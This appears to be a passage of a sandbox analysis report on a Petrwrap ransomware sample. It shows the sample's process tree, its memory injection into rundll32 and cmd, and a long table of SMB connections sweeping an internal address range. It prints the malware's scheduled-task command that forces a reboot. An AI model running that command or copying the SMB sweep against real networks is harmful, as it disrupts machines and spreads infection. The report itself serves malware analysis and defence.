Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\202E.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1144 wrote to memory of 2256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2700 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\202E.tmp
PID 1144 wrote to memory of 2700 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\202E.tmp
PID 1144 wrote to memory of 2700 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\202E.tmp
PID 1144 wrote to memory of 2700 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\202E.tmp
PID 2256 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2256 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\202E.tmp

"C:\Users\Admin\AppData\Local\Temp\202E.tmp" \\.\pipe\{4A5FD4FC-5F3C-4E90-A8BC-D1C788D247F5}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.67:139 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.128:139 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.201:139 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.242:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.254:139 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.6:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.12:139 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.18:139 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.24:139 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.32:139 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.1.38:139 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.39:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.43:139 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.45:139 tcp
N/A 10.127.1.46:445 tcp
DE 136.243.76.21:445 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.1.50:445 tcp
N/A 10.127.1.50:139 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.53:139 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.56:139 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.57:139 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.58:139 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.1.59:139 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.63:139 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp
N/A 10.127.1.65:445 tcp
N/A 10.127.1.65:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.1.66:139 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.67:139 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.68:139 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.1.69:139 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.70:139 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.71:139 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.1.72:139 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.73:139 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.74:139 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.75:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.1.76:139 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.77:139 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.1.78:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.1.79:139 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.80:139 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.81:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.82:139 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.83:139 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.84:139 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.1.85:139 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.1.86:139 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.87:139 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.88:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.1.89:139 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.90:139 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.91:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.1.92:445 tcp
N/A 10.127.1.92:139 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.93:139 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.94:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.95:139 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.96:139 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.97:139 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.1.98:139 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.1.99:139 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.100:139 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.1.101:139 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.102:139 tcp
N/A 10.127.1.103:445 tcp
